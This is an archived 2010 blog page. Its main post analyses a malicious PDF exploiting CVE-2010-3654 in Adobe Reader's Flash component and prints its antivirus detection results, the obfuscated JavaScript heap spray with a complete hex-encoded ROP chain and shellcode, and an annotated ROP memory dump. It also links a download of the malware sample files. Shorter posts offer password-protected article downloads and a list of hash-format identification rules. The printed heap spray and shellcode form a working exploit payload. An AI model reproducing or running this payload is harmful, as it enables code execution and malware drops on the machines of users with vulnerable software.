Black.hat: November 2010

Saturday, November 27, 2010

CVE-2010-3654

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3654

des :

Adobe Flash Player before 9.0.289.0 and 10.x before 10.1.102.64 on Windows, Mac OS X, Linux, and Solaris and 10.1.95.1 on Android, and authplay.dll (aka AuthPlayLib.bundle or libauthplay.so.0.0.0) in Adobe Reader and Acrobat 9.x through 9.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via crafted SWF content, as exploited in the wild in October 2010.

---

pdf file (uncompressed)

PDF Comment %PDF-1.7



PDF Comment %âãÏÓ




obj 26 0

 Type:

 Referencing:


<</Linearized 1/L 241680/O 29/E 6094/N 1/T 241354/H [ 513 208]>>



 <<

   /Linearized 1

   /L 241680

   /O 29

   /E 6094

   /N 1

   /T 241354

   /H [ 513 208]

 >>



<</Linearized 1/L 241680/O 29/E 6094/N 1/T 241354/H [ 513 208]>>



obj 37 0

 Type: /XRef

 Referencing: 25 0 R, 27 0 R

 Contains stream


<</DecodeParms<</Columns 4/Predictor 12>>/Filter/FlateDecode/ID[<BFEF0C62A7E9A94FAAEC52A3E6C8279A><CF478FAC136BCC4BA27379A9D0BF1937>]/Index[26 47]/Info 25 0 R/Length 66/Prev 241355/Root 27 0 R/Size 73/Type/XRef/W[1 2 1]>>


 <<

   /DecodeParms /Columns 4

   /Predictor 12

 >>


  </pre>

pdf file (compressed)

%PDF-1.7

%âãÏÓ

26 0 obj

<</Linearized 1/L 241680/O 29/E 6094/N 1/T 241354/H [ 513 208]>>

endobj

               

37 0 obj

<</DecodeParms<</Columns 4/Predictor 12>>/Filter/FlateDecode/ID[<BFEF0C62A7E9A94FAAEC52A3E6C8279A><CF478FAC136BCC4BA27379A9D0BF1937>]/Index[26 47]/Info 25 0 R/Length 66/Prev 241355/Root 27 0 R/Size 73/Type/XRef/W[1 2 1]>>stream

hÞbbd ``b`: $

----

virus total analyse

Antivirus     Version     Last Update     Result

AhnLab-V3     2010.11.02.00     2010.11.01     PDF/Cve-2010-3654

AntiVir     7.10.13.77     2010.11.01     -

Antiy-AVL     2.0.3.7     2010.11.01     Exploit/Win32.CVE-2010-3654

Authentium     5.2.0.5     2010.11.01     -

Avast     4.8.1351.0     2010.11.01     JS:Pdfka-gen

Avast5     5.0.594.0     2010.11.01     JS:Pdfka-gen

AVG     9.0.0.851     2010.11.02     Exploit_c.NLK

BitDefender     7.2     2010.11.02     Exploit.PDF-JS.Gen

CAT-QuickHeal     11.00     2010.10.26     -

ClamAV     0.96.2.0-git     2010.11.02     BC.PDF.Parser-4.MalwareFound

Comodo     6583     2010.11.01     -

DrWeb     5.0.2.03300     2010.11.02     -

Emsisoft     5.0.0.50     2010.11.02     Exploit.Win32.CVE-2010-3654!IK

eSafe     7.0.17.0     2010.11.01     -

eTrust-Vet     36.1.7948     2010.11.01     PDF/CVE-2010-3654!exploit

F-Prot     4.6.2.117     2010.11.01     W32/Heuristic-XEN!Eldorado

F-Secure     9.0.16160.0     2010.11.02     Exploit:W32/Pidief.CSR

Fortinet     4.2.249.0     2010.11.01     JS/Agent.FSH!exploit

GData     21     2010.11.02     Exploit.PDF-JS.Gen

Ikarus     T3.1.1.90.0     2010.11.02     Exploit.Win32.CVE-2010-3654

Jiangmin     13.0.900     2010.11.01     -

K7AntiVirus     9.67.2882     2010.11.01     -

Kaspersky     7.0.0.125     2010.11.01     Exploit.Win32.CVE-2010-3654.a

McAfee     5.400.0.1158     2010.11.02     -

McAfee-GW-Edition     2010.1C     2010.11.01     Heuristic.BehavesLike.PDF.Suspicious.O

Microsoft     1.6301     2010.11.01     Exploit:Win32/Pdfjsc.gen!A

NOD32     5583     2010.11.01     JS/Exploit.Pdfka.OKB

Norman     6.06.10     2010.11.01     JS/CVE-2010-3654.A

nProtect     2010-11-01.01     2010.11.01     Exploit.PDF-JS.Gen

Panda     10.0.2.7     2010.11.01     Exploit/PDF.Flash.A

PCTools     7.0.3.5     2010.11.02     Trojan.Pidief

Prevx     3.0     2010.11.02     -

Rising     22.71.06.04     2010.11.01     -

Sophos     4.59.0     2010.11.02     Troj/SWFLdr-V

Sunbelt     7190     2010.11.02     Exploit.PDF-JS.Gen (v)

SUPERAntiSpyware     4.40.0.1006     2010.11.02     -

Symantec     20101.2.0.161     2010.11.02     Trojan.Pidief

TheHacker     6.7.0.1.075     2010.11.02     -

TrendMicro     9.120.0.1004     2010.11.01     TROJ_PIDIEF.WV

TrendMicro-HouseCall     9.120.0.1004     2010.11.02     TROJ_PIDIEF.WV

VBA32     3.12.14.1     2010.11.01     -

ViRobot     2010.10.4.4074     2010.11.01     PDF.S.Exploit.241679

VirusBuster     12.70.15.0     2010.11.01     -

PEiD: -

packers (F-Prot): XORCrypt

packers (Kaspersky): Swf2Swc

PDFiD:

PDF Header: %PDF-1.7

obj 22

endobj 22

stream 19

endstream 19

xref 0

trailer 0

startxref 2

/Page 1

/Encrypt 0

/ObjStm 5

/JS 0

/JavaScript 0

/AA 0

/OpenAction 0

/AcroForm 0

/JBIG2Decode 0

/RichMedia 0

/Colors > 2^24 0

}

document information

content/type: PDF document, version 1.7

Object 4.0 @ 12391: suspicious.flash Embedded Flash

Object 4.0 @ 12391: flash.exploit CVE-2010-3654

Object 28.0 @ 945: suspicious.obfuscation using unescape

Object 28.0 @ 945: suspicious.string heap spray shellcode

Object 35.0 @ 4944: suspicious.flash Adobe Shockwave Flash in a PDF define obj type

---

now about exploit

first :

this is curvedPolygon.

function drawLines():void {

var i:int;

var n:int = vecPoints.length;

var vecCmds:Vector.<int> = new Vector.<int>();

var vecCoords:Vector.<Number> = new Vector.<Number>();

for(i=0; i<n; i++) {

vecCoords[2*i] = vecPoints[i].x;

vecCoords[2*i+1] = vecPoints[i].y;

}

vecCoords[2*n] = vecPoints[0].x;

vecCoords[2*n+1] = vecPoints[0].y;

for(i=0; i<=(n/2); i++) {

vecCmds[i] = 3; // This line creates "curveTo" commands

}

vecCmds[0] = 1;

shLines.graphics.clear();

shLines.graphics.lineStyle(1,0);

shLines.graphics.beginFill(0xFF0000);

shLines.graphics.drawPath(vecCmds, vecCoords,vecWind[rbgWind.selectedData]);

shLines.graphics.endFill();

} </pre>

source code of heap spray

var p = unescape;

var len = "\x6c\x65\x6e\x67\x74\x68";

var s2 = "\x73\x75\x62\x73\x74\x72\x69\x6e\x67";

var s3 = "\x73\x75\x62\x73\x74\x72";

function a(__){var _='';for(var ___=0;___<__[len];___+=4) _+='%'+'u'+__[s3](___,4);return _;}

function s()

{

c=p(a("58585858"));

while(c[len] + 20 + 8 < 0x10000) c = c + c;

b = c[s2](0,(0x5858-0x24)/2);

b += p(a("585858582fe10700deadbeefb00bface5868585849190700cccccccc48ef0700156f0700cccccccc90840700908407009084070090840700908407009084070090330700908407000c0c0c0c9084070090840700908407009084070090840700908407009084070090840700159907000124000172f707000104000115bb070010000000154d070015bb070003007ffe7fb2070015bb070000110001a8ac070015bb070001000001a8ac070072f707000011000152e207005c540700ffffffff0100000100000000010400011000000000400000d731070015bb0700905a9054154d0700a722070015bb0700eb5a5815154d0700a722070015bb07001a8b1889154d0700a722070015bb0700c0838304154d0700a722070015bb070004c2fb81154d0700a722070015bb07000c0c0c0c154d0700a722070015bb0700ee7505eb154d0700a722070015bb0700e6e8ffff154d0700a722070015bb070090ff9090154d0700a722070015bb070090909090154d0700a722070015bb070090909090154d0700a722070015bb0700ffff90ff154d0700d7310700112f0700909090902FE90005C300C08BD23302EB4240388075008BF9C3C2C08B8951240404EB088842400A8AC984F67500C68B002404C35A575601BE00003B0072D6300846083B4073D68BF85FC7C35E8B6430050000850078C08B0E0C40408B8B148B008B0010408BC33440808B00B8000090C33351EBD28B16C1CA03E1E183C1FF1DEACA0BD233108ACA33D18B80400038E57514898B242404C35A8B5583ECE4C456538B57085D458B890CFC45C38B81664D380F5AC28500008B003C40C30345898BF4F445388145500000850F00AB0000458B83F478C038830F009C840000830004780F00928400008B00F455528B8B7803C389D0F055558B83F0187A74008B7CF055528B032089D0E855558B8BF02452D00355898BECF055528B031C89D0E455458B8BF01878854F72FF4750F633458B8BE8B004C30337E8FFFF3BFF0C4537757D8300101D74458B8910F845458B0FEC04B78B70F05542035010FF53F8554589EBFC8B18EC45B70F7004558B8BE48204C3034589EBFC4604754F8BB3FC455E5F8B5B5DE50CC28D000040895124040CEB8040223806758940240405EB388075008BEF2404C35A8951240409EBF9807422880A40088A42840A75C9C6F10000048B5A248DC30040C4838DF82454330489C9240C028902EB02FF0A8B39807500EBF78B13800A5C390A75028B0489FF24240406EB0AFF023BE976048B5924C35A56535157F98BD88B006A806800006A006A026A00680200004000FF521253F08B006A006A006AFF562E53006A448D04248B50E8C7FDD8FFFF5750FF561653FF5622535F5A5B5E90C356535557C481FC58FFFF4C890424F28B04898B24241C7C83042475008D232444501804680001FF002A53448D18048B50E8C6FF4AFFFFD08BE858FD9AFFFF1CEB448D182468500104000053FF8D2A04448B182414C283E869FD7CFFFF006A806800006A006A036A00680100008000FF561253F08B006A806800006A006A026A00680200004000448D3024FF501253E88BFF337C83042475016A0E6A008B004E43565053FFEB2E6A0F6A008B004E4343035052FF562E53006A006A006AFF552E53448B0424E88372010F57BB8500006A008D0024445018906800018D00248401240000565053FF8D1A2484011800004B8ABA5601900000F5E8FFFC6AFF8D0024445018906800018D00248401240000555053FF811690C700013B00527BB1726AEB006A006A7568008A560053FF6A2E8D0024445018046A448D1824565053FF6A1A6A008B004E4343035052FF562E53006A448D18246A508D012444501CFF561A53448D10244B8ABA56000100007FE8FFFC6AFF8D0024445018016A448D1C24555053FF47167C3B0C24C472FF562253FF552253448B0424E88372010F0B90840000E900009F0000538D8D74248402A8000023E8FFFC8DFF74430BE8FFFC8DFF048402A80000548D18240BE8FFFC8DFF7443F3E8FFFB8BFF8DF02444E818FBE8FFFFF003848DA83400028D00CA930000E800FBE4FFFF448D182468500104000053FF8D2A04448D185F53CBE8FFFB8DFF248C02A80000548D1824048BE824FD98FFFF006A448D1C24FF502653006A53FFEB366A146A016A008D0024445024438D505A006A53FF8A4624448108A8C400035D005E5FC35B56535557C4838DF4246CC60424048B00E8D8FB9EFFFFF88B006A438B500EE857FBDCFFFFF08B7389850E74F65667438B500AE857FBC8FFFF4389830A0A7B74008D5301434589EB008B42004523E8FFFB89FF24448B080045FF500A53F88B448B08240140004514EB438B500E57568DE8FFFB8BFF0055028945830400458B8B00853075F683E30045FE04800B003BB97704C60124048A83240CC45F5D5B5E90C38B5581EC00C4FFFEE8FF000000002D583E4600404589B8FC3EAC0040450389FCF845458BE8F8FF36FFFFC0844074458BFFF8325017E8FFFCE8FFFC12FFFFD08B858DFE03FFFF21E8FFFC8DFF0395FFFEB9FF00010000458BE8F8FCAEFFFF958DFE03FFFFC933458BE8F8FC9EFFFFE58BC35DC08B6B027265656E336C0032FD89A4129B84F2502A7A38C6C54558D855450BE2EFE79554D616C0D6F74B016EDC95B929FD70A9D123B7C8AF2CB9E6FF0000000068736C65336C003241934574000000008A70000058000002007B0000706F6E657E006574706D622E74617E00652E65780000000000006970676E31203732302E302E312E2D20206E2033202661746B73696B6C6C2F206D6941207263626F7461652E65782F202066202661746B73696B6C6C2F206D6941207263526F33642E3278652065662F26202220000000220000909090900c900c0c0c0c"));

b += c;

d = b[s2](0,0x10000/2);

e = c[s2](0,0x8000-(0x1020-0x08)/2);

while(d[len] < 0x80000) d+=d;

_3 = d[s2](0,0x80000-(0x1020-0x08)/2);

_4= new Array();

_5 =    new Array();

for(i=0;i<0x300;i=i+1)

for(j=0;j<16;j++)

 _5[i*16+j]=e+"y";


for(i=0;i<0x300;i=i+1)

for(j=0;j<15;j++)

 _5[i*16+j]=null;



for(i=0;i<0x280;i=i+1)    _4[i]                =_3        + "s";

}

s(); 
}

exploit use rop technology

58585854   58585858

58585858   07002FE1  BIB.07002FE1

5858585C   BEEFDEAD

58585860   FACEB00B

58585864   58585868

58585868   07004919  BIB.07004919

5858586C   CCCCCCCC

58585870   070048EF  BIB.070048EF   

58585874   0700156F  BIB.0700156F

58585878   CCCCCCCC

5858587C   07009084  BIB.07009084

58585880   07009084  BIB.07009084

58585884   07009084  BIB.07009084

58585888   07009084  BIB.07009084

5858588C   07009084  BIB.07009084

58585890   07009084  BIB.07009084

58585894   07009033  BIB.07009033

58585898   07009084  BIB.07009084

5858589C   0C0C0C0C 

585858A0   07009084  BIB.07009084

585858A4   07009084  BIB.07009084

585858A8   07009084  BIB.07009084

585858AC   07009084  BIB.07009084

585858B0   07009084  BIB.07009084

585858B4   07009084  BIB.07009084

585858B8   07009084  BIB.07009084

585858BC   07009084  BIB.07009084

585858C0   07001599  BIB.07001599

585858C4   00010124  UNICODE "Q:="

585858C8   070072F7  BIB.070072F7

585858CC   00010104  UNICODE "=N:="

585858D0   070015BB  BIB.070015BB

585858D4   00001000

585858D8   0700154D  BIB.0700154D

585858DC   070015BB  BIB.070015BB

585858E0   7FFE0300

585858E4   07007FB2  BIB.07007FB2

585858E8   070015BB  BIB.070015BB

585858EC   00010011

585858F0   0700A8AC  BIB.0700A8AC

585858F4   070015BB  BIB.070015BB

585858F8   00010100

585858FC   0700A8AC  BIB.0700A8AC

58585900   070072F7  BIB.070072F7

58585904   00010011

58585908   070052E2  BIB.070052E2

5858590C   07005C54  BIB.07005C54

58585910   FFFFFFFF

58585914   00010100

58585918   00000000

5858591C   00010104  UNICODE "=N:="

58585920   00001000

58585924   00000040

58585928   0700D731  BIB.0700D731

5858592C   070015BB  BIB.070015BB

58585930   9054905A

58585934   0700154D  BIB.0700154D

58585938   0700A722  BIB.0700A722

5858593C   070015BB  BIB.070015BB

58585940   5815EB5A 

58585944   0700154D  BIB.0700154D

58585948   0700A722  BIB.0700A722

5858594C   070015BB  BIB.070015BB

58585950   18891A8B

58585954   0700154D  BIB.0700154D

58585958   0700A722  BIB.0700A722

5858595C   070015BB  BIB.070015BB

58585960   8304C083

58585964   0700154D  BIB.0700154D

58585968   0700A722  BIB.0700A722

5858596C   070015BB  BIB.070015BB

58585970   FB8104C2

58585974   0700154D  BIB.0700154D

58585978   0700A722  BIB.0700A722

5858597C   070015BB  BIB.070015BB

58585980   0C0C0C0C 

58585984   0700154D  BIB.0700154D

58585988   0700A722  BIB.0700A722

5858598C   070015BB  BIB.070015BB

58585990   05EBEE75 

58585994   0700154D  BIB.0700154D

58585998   0700A722  BIB.0700A722

5858599C   070015BB  BIB.070015BB

585859A0   FFFFE6E8

585859A4   0700154D  BIB.0700154D

585859A8   0700A722  BIB.0700A722

585859AC   070015BB  BIB.070015BB

585859B0   909090FF

585859B4   0700154D  BIB.0700154D

585859B8   0700A722  BIB.0700A722

585859BC   070015BB  BIB.070015BB

585859C0   90909090

585859C4   0700154D  BIB.0700154D

585859C8   0700A722  BIB.0700A722

585859CC   070015BB  BIB.070015BB

585859D0   90909090

585859D4   0700154D  BIB.0700154D

585859D8   0700A722  BIB.0700A722

585859DC   070015BB  BIB.070015BB

585859E0   90FFFFFF

585859E4   0700154D  BIB.0700154D

585859E8   0700D731  BIB.0700D731

585859EC   0700112F  BIB.0700112F

585859F0   90909090

585859F4   00052FE9

585859F8   C08BC300

585859FC   02EBD233

58585A00   38804240 

58585A04   8BF97500

58585A08   C08BC3C2

58585A0C   24048951

58585A10   088804EB

58585A14   0A8A4240

58585A18   F675C984

58585A1C   8B0000C6

58585A20   C35A2404

58585A24   01BE5756  AcroRd_1.01BE5756

58585A28   3B000000 

58585A2C   300872D6 

58585A30   3B404608 

58585A34   8BF873D6

58585A38   C35E5FC7

58585A3C   30058B64 

58585A40   85000000

58585A44   8B0E78C0

58585A48   408B0C40

58585A4C   8B008B14

58585A50   10408B00

58585A54   34408BC3 

58585A58   00B8808B  AcroRd_1.00B8808B

58585A5C   90C30000

58585A60   EBD23351

58585A64   C1CA8B16

58585A68   E18303E1

58585A6C   1DEAC1FF

58585A70   D233CA0B

58585A74   CA33108A

58585A78   8040D18B

58585A7C   E5750038

58585A80   8B241489

58585A84   C35A2404

58585A88   83EC8B55

58585A8C   5653E4C4 

58585A90   085D8B57

58585A94   890C458B

58585A98   C38BFC45

58585A9C   4D388166

58585AA0   C2850F5A

58585AA4   8B000000

58585AA8   C3033C40

58585AAC   8BF44589

58585AB0   3881F445 

58585AB4   00004550

58585AB8   00AB850F  AcroRd_1.00AB850F

58585ABC   458B0000

58585AC0   78C083F4

58585AC4   0F003883

58585AC8   00009C84

58585ACC   04788300 

58585AD0   92840F00

58585AD4   8B000000

58585AD8   528BF455

58585ADC   03C38B78

58585AE0   F05589D0

58585AE4   83F0558B

58585AE8   7400187A

58585AEC   F0558B7C

58585AF0   0320528B

58585AF4   E85589D0

58585AF8   8BF0558B

58585AFC   D0032452

58585B00   8BEC5589

58585B04   528BF055

58585B08   89D0031C

58585B0C   458BE455 

58585B10   18788BF0

58585B14   72FF854F

58585B18   F6334750

58585B1C   8BE8458B

58585B20   C303B004

58585B24   FFFF37E8

58585B28   0C453BFF

58585B2C   7D833775

58585B30   1D740010

58585B34   8910458B

58585B38   458BF845 

58585B3C   04B70FEC

58585B40   F0558B70

58585B44   50104203

58585B48   F855FF53

58585B4C   EBFC4589

58585B50   EC458B18

58585B54   7004B70F

58585B58   8BE4558B

58585B5C   C3038204

58585B60   EBFC4589

58585B64   754F4604

58585B68   FC458BB3

58585B6C   8B5B5E5F

58585B70   0CC25DE5

58585B74   00408D00  AcroRd32.00408D00

58585B78   24048951

58585B7C   80400CEB

58585B80   06752238 

58585B84   24048940

58585B88   388005EB 

58585B8C   8BEF7500

58585B90   C35A2404

58585B94   24048951

58585B98   F98009EB

58585B9C   880A7422

58585BA0   8A424008

58585BA4   75C9840A

58585BA8   0000C6F1

58585BAC   5A24048B 

58585BB0   00408DC3  AcroRd32.00408DC3

58585BB4   8DF8C483

58585BB8   33042454 

58585BBC   240C89C9

58585BC0   02EB0289

58585BC4   0A8B02FF

58585BC8   75003980

58585BCC   8B13EBF7

58585BD0   5C39800A 

58585BD4   028B0A75  xpsp2res.028B0A75

58585BD8   FF240489

58585BDC   06EB2404 

58585BE0   023B0AFF

58585BE4   048BE976

58585BE8   C35A5924

58585BEC   51575653 

58585BF0   D88BF98B

58585BF4   8068006A

58585BF8   6A000000

58585BFC   6A006A02

58585C00   00006802

58585C04   FF524000

58585C08   F08B1253

58585C0C   006A006A

58585C10   FF56006A

58585C14   006A2E53

58585C18   0424448D

58585C1C   E8C78B50

58585C20   FFFFFDD8

58585C24   FF565750

58585C28   FF561653

58585C2C   5F5A2253 

58585C30   90C35B5E

58585C34   55575653 

58585C38   FC58C481

58585C3C   4C89FFFF

58585C40   F28B0424

58585C44   8B240489

58585C48   7C83241C  kernel32.7C83241C

58585C4C   75000424

58585C50   24448D23

58585C54   04685018

58585C58   FF000001

58585C5C   448D2A53 

58585C60   8B501804

58585C64   FF4AE8C6

58585C68   D08BFFFF

58585C6C   FD9AE858

58585C70   1CEBFFFF

58585C74   1824448D

58585C78   01046850  RETURN to AcroRd_1.01046850 from AcroRd_1.0104FC7B

58585C7C   53FF0000 

58585C80   04448D2A

58585C84   24148B18

58585C88   E869C283

58585C8C   FFFFFD7C

58585C90   8068006A

58585C94   6A000000

58585C98   6A006A03

58585C9C   00006801

58585CA0   FF568000

58585CA4   F08B1253

58585CA8   8068006A

58585CAC   6A000000

58585CB0   6A006A02

58585CB4   00006802

58585CB8   448D4000 

58585CBC   FF503024

58585CC0   E88B1253

58585CC4   7C83FF33  kernel32.7C83FF33

58585CC8   75010424

58585CCC   6A006A0E

58585CD0   4E438B00

58585CD4   53FF5650 

58585CD8   6A0FEB2E

58585CDC   8B006A00

58585CE0   43034E43

58585CE4   FF565052

58585CE8   006A2E53

58585CEC   006A006A

58585CF0   2E53FF55

58585CF4   0424448B

58585CF8   7201E883

58585CFC   BB850F57

58585D00   6A000000

58585D04   24448D00

58585D08   90685018

58585D0C   8D000001

58585D10   01242484  AcroRd_1.01242484

58585D14   56500000 

58585D18   8D1A53FF

58585D1C   01182484  ASCII "in control of the screen. Your keyboard and mouse input will now affect the sharer's desktop."

58585D20   4B8A0000

58585D24   0190BA56  AcroRd_1.0190BA56

58585D28   F5E80000

58585D2C   6AFFFFFC

58585D30   24448D00

58585D34   90685018

58585D38   8D000001

58585D3C   01242484  AcroRd_1.01242484

58585D40   55500000 

58585D44   811653FF

58585D48   000190C7

58585D4C   527B3B00 

58585D50   6AEBB172

58585D54   006A006A

58585D58   008A7568

58585D5C   53FF5600 

58585D60   8D006A2E

58585D64   50182444

58585D68   448D046A 

58585D6C   56501824 

58585D70   6A1A53FF

58585D74   8B006A00

58585D78   43034E43

58585D7C   FF565052

58585D80   006A2E53

58585D84   1824448D

58585D88   8D016A50

58585D8C   501C2444 

58585D90   1A53FF56

58585D94   1024448D

58585D98   BA564B8A

58585D9C   00000001

58585DA0   FFFC7FE8

58585DA4   8D006AFF

58585DA8   50182444

58585DAC   448D016A 

58585DB0   55501C24 

58585DB4   471653FF

58585DB8   0C247C3B

58585DBC   FF56C472

58585DC0   FF552253

58585DC4   448B2253

58585DC8   E8830424

58585DCC   0F0B7201

58585DD0   00009084

58585DD4   009FE900  RETURN to AcroRd_1.009FE900 from AcroRd_1.009FF9D6

58585DD8   538D0000 

58585DDC   24848D74

58585DE0   000002A8

58585DE4   FFFC23E8

58585DE8   74438DFF

58585DEC   FFFC0BE8

58585DF0   04848DFF

58585DF4   000002A8

58585DF8   1824548D

58585DFC   FFFC0BE8

58585E00   74438DFF

58585E04   FFFBF3E8

58585E08   8DF08BFF

58585E0C   E8182444

58585E10   FFFFFBE8

58585E14   848DF003

58585E18   0002A834

58585E1C   CA938D00

58585E20   E8000000

58585E24   FFFFFBE4

58585E28   1824448D

58585E2C   01046850  RETURN to AcroRd_1.01046850 from AcroRd_1.0104FC7B

58585E30   53FF0000 

58585E34   04448D2A

58585E38   5F538D18 

58585E3C   FFFBCBE8

58585E40   248C8DFF

58585E44   000002A8

58585E48   1824548D

58585E4C   E824048B

58585E50   FFFFFD98

58585E54   448D006A 

58585E58   FF501C24

58585E5C   006A2653

58585E60   EB3653FF

58585E64   6A016A14

58585E68   8D006A00

58585E6C   50242444 

58585E70   505A438D 

58585E74   53FF006A 

58585E78   24448A46

58585E7C   A8C48108

58585E80   5D000003 

58585E84   C35B5E5F

58585E88   55575653 

58585E8C   8DF4C483

58585E90   C604246C

58585E94   8B002404

58585E98   FB9EE8D8

58585E9C   F88BFFFF

58585EA0   438B006A

58585EA4   E857500E

58585EA8   FFFFFBDC

58585EAC   7389F08B

58585EB0   74F6850E

58585EB4   438B5667

58585EB8   E857500A

58585EBC   FFFFFBC8

58585EC0   830A4389

58585EC4   74000A7B

58585EC8   01438D53  ASCII "@ZU?$less@G@std@@V?$ASAllocator@U?$pair@$$CBGP8Acrobat@AFModel@@AEXABVVal@AFFramework@@@Z@std@@@@$0A@@std@@@std@@"

58585ECC   EB004589

58585ED0   00458B42

58585ED4   FFFB23E8

58585ED8   244489FF

58585EDC   00458B08

58585EE0   0A53FF50

58585EE4   448BF88B

58585EE8   01400824  AcroRd_1.01400824

58585EEC   14EB0045

58585EF0   500E438B

58585EF4   8DE85756

58585EF8   8BFFFFFB

58585EFC   02890055  xpsp2res.02890055

58585F00   04004583 

58585F04   8B00458B

58585F08   75F68530

58585F0C   004583E3

58585F10   800BFE04

58585F14   B977003B

58585F18   012404C6  ASCII "Resolution"

58585F1C   8324048A

58585F20   5F5D0CC4 

58585F24   90C35B5E

58585F28   81EC8B55

58585F2C   FFFE00C4

58585F30   0000E8FF

58585F34   2D580000

58585F38   00403E46  AcroRd32.00403E46

58585F3C   B8FC4589

58585F40   00403EAC  AcroRd32.00403EAC

58585F44   89FC4503

58585F48   458BF845 

58585F4C   FF36E8F8

58585F50   C084FFFF

58585F54   458B4074

58585F58   3250FFF8 

58585F5C   FFFC17E8

58585F60   FC12E8FF

58585F64   D08BFFFF

58585F68   FE03858D

58585F6C   21E8FFFF 

58585F70   8DFFFFFC

58585F74   FFFE0395

58585F78   0001B9FF

58585F7C   458B0000

58585F80   FCAEE8F8

58585F84   958DFFFF

58585F88   FFFFFE03

58585F8C   458BC933 

58585F90   FC9EE8F8

58585F94   E58BFFFF

58585F98   C08BC35D

58585F9C   72656B02

58585FA0   336C656E 

58585FA4   FD890032

58585FA8   9B84A412

58585FAC   2A7AF250

58585FB0   C54538C6

58585FB4   554558D8

58585FB8   EFE70BE2

58585FBC   D6169554

58585FC0   F74BC0D6

58585FC4   DC95016E

58585FC8   FD70B929

58585FCC   23B7A9D1

58585FD0   2CB9C8AF

58585FD4   0000E6FF

58585FD8   68730000

58585FDC   336C6C65 

58585FE0   41930032

58585FE4   00004574

58585FE8   8A700000

58585FEC   58000000 

58585FF0   007B0002

58585FF4   706F0000

58585FF8   7E006E65

58585FFC   706D6574

58586000   7461622E

58586004   652E7E00

58586008   00006578

5858600C   00000000

58586010   676E6970

58586014   37323120 

58586018   302E302E 

5858601C   2D20312E

58586020   2033206E 

58586024   61742026 

58586028   696B6B73

5858602C   2F206C6C

58586030   41206D69

58586034   626F7263  rt3d.626F7263

58586038   652E7461

5858603C   2F206578

58586040   20262066 

58586044   6B736174

58586048   6C6C696B

5858604C   6D692F20

58586050   72634120

58586054   3364526F 

58586058   78652E32

5858605C   662F2065

58586060   22202620  Annots.22202620

58586064   00220000

58586068   90900000

5858606C   0C909090

58586070   0C0C0C0C

shellcode drops in %temp% directory ~.exe , ~temp.bat, pdf named same as pdf

download files = http://www.mediafire.com/?va3mw7fe5vqygha

----------------

wisp trojan?

https://www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?Name=Trojan:Win32/Wisp.A

http://www.threatexpert.com/report.aspx?md5=9f0cefe847174185030a1f027b3813ec

http://www.securityhome.eu/malware/malware.php?mal_id=897505004b9a591d6da897.20308017

refrence : news.softpedia.com

Microtik (os / router)

this article is about microtik (os/router)
in this article u learn how configure and starting microtik (os/router) for begginers
download link = http://www.mediafire.com/?e5lv6tmq3m7mzou
pass = e-omidfar.blogspot.com

Collision for hash functions

Collision for hash functions
md4,md5, haval-128,ripemd

download link = http://www.mediafire.com/?m3pj46cnf888e03

Hiding Shellcode in Plain Sight

download link = http://www.mediafire.com/?d4pk15u24aou4a0
pass = e-omidfar.blogspot.com

Friday, November 26, 2010

lang = persian
this article is about mysql , mssql , oracle,msaccess,postgre
download link : http://www.mediafire.com/?3y95tidkod6jud2
pass = e-omidfar.blogpost.com

hash

ADLER32: long: 8 only numbers and lowercase <g

Blowfish long: 60 only numbers, lowercase, Uppercase, /,. starts with $2a$, sign 7 from left is $

CRC-16: long: 4 only numbers and lowercase <g

CRC-16-CCITT: long: 4 only numbers and lowercase <g

CRC-32: long: 8 only numbers and lowercase <g

CRC-32B: long: 8 only numbers and lowercase <g

DES (Unix): long: 13 lowecase, uppercase, numbers, / and .

DCC long: 32 only numbers and lowercase <g

Elf-32: long: 9 only numbers

FCS-16: long: 4 only numbers and lowercase <g

GHash-32-3: long: 8 only numbers and lowercase <g

GHash-32-5: long: 8 only numbers and lowercase <g

GOST R34.11-94: long: 64 only numbers and lowercase <g

Haval128_3: long: 32 only numbers and lowercase <g

Haval128_4: long: 32 only numbers and lowercase <g

Haval128_5 long: 32 only numbers and lowercase <g

Haval128 (Base64): long: 24 only numbers, lowercase, Uppercase, + ,/,., ends on ==

Haval128 (HMAC): long: 32 only numbers and lowercase <g

Haval160: long: 40 only numbers and lowercase <g

Haval160_3: long: 40 only numbers and lowercase <g

Haval160_4: long: 40 only numbers and lowercase <g

Haval160_5: long: 40 only numbers and lowercase <g

Haval160 (Base64): long: 28 only numbers, lowercase, Uppercase, + ,/,., ends on =

Haval160 (HMAC): long: 40 only numbers and lowercase <g

Haval192: long: 48 only numbers and lowercase <g

Haval192 (Base64): long: 32 only numbers, lowercase, Uppercase, + ,/,.

Haval192_4: long: 48 only numbers and lowercase <g

Haval195_5: long: 48 only numbers and lowercase <g

Haval192 (HMAC): long: 48 only numbers and lowercase <g

Haval224: long: 56 only numbers and lowercase <g

Haval224 (Base64): long: 40 only numbers, lowercase, Uppercase, + ,/,., ends on ==

Haval244_3: long: 56 only numbers and lowercase <g

Havan244_4: long: 56 only numbers and lowercase <g

Haval256_5: long: 64 only numbers and lowercase <g

Haval224 (HMAC): long: 56 only numbers and lowercase <g

Haval256: long: 64 only numbers and lowercase <g

Haval256 (Base64): long: 44 only numbers, lowercase, Uppercase, + ,/,., ends on ==

Haval256_3: long: 64 only numbers and lowercase <g

Haval256_4: long: 64 only numbers and lowercase <g

Haval256 (HMAC): long: 64 only numbers and lowercase <g

Haval256_3: long: 64 only numbers and lowercase <g

MD2: long: 32 only numbers and lowercase <g

MD2 (Base64): long: 24 only numbers, lowercase, Uppercase, + ,/,., ends on ==

MD2 (HMAC): long: 32 only numbers and lowercase <g

MD4: long: 32 only numbers and lowercase <g

MD4 (Base64): long: 24 only numbers, lowercase, Uppercase, + ,/,., ends on ==

MD4 (HMAC): long: 32 only numbers and lowercase <g

MD5: long: 32 only numbers and lowercase <g

MD5 (HMAC): long: 32 only numbers and lowercase <g

MD5 (Base64): long: 24 only numbers, lowercase, Uppercase, + ,/,., ends on ==

MD5 (APR): long: 37 $apr1$ZSc84vgF$YiKqBzqnUskAPKeDWlN8/0

starts with $apr1$, sign 15 from left is $

numbers, lowercase, Uppercase, . and /



MD5 (Unix): long: 34 $1$P2lE.rGp$SYCpUzBZjWRGKyMe/MbU00 starts with $1$, sign 12 from left is $



MySQL: long: 16 only numbers and lowercase <g

MySQL v5.x: long: 40 only numbers and lowercase <g

NTLM: long: 32 only numbers and lowercase <g

PANAMA long: 64 only numbers and lowercase <g

